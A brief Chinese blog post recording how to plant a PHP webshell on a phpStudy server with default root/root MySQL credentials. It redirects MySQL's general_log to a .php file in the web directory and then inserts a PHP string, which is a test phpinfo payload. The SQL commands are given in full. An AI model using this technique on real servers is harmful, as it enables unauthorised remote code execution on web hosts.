其实不是什么新技术,记录下来.
PHPStudy环境.内网.root/root默认密码.
想当然的.就先用select XX into outfile XXXX
但是由于phpstudy开启了secure-file-priv导致无法outfile.

群里问了下,可以通过日志general_log的方式.默认是是OFF的
SHOW VARIABLES LIKE 'general%'
使用这个命令查询,然后执行下面的命令:

set global general_log = "ON";
set global general_log_file='D:\phpStudy\phpMyAdmin\xxx.php';

这样日志就写到web目录了.

后面,查询一下.结果,卡住了.不知道为什么.
select version()都可以执行,都可以写入php的log文件.
后来尝试phpmyadmin新建一个字段,直接插入一句话shell,这里执行的应该是insert语句.

CREATE TABLE IF NOT EXISTS `webshell` ( `shell` varchar(100) NOT NULL) ENGINE=MyISAM DEFAULT CHARSET=utf8;
INSERT INTO `webshell` (`shell`) VALUES ('<?php echo "test by kele";phpinfo();?>');

这样日志里面就有webshell了.

标签: none

添加新评论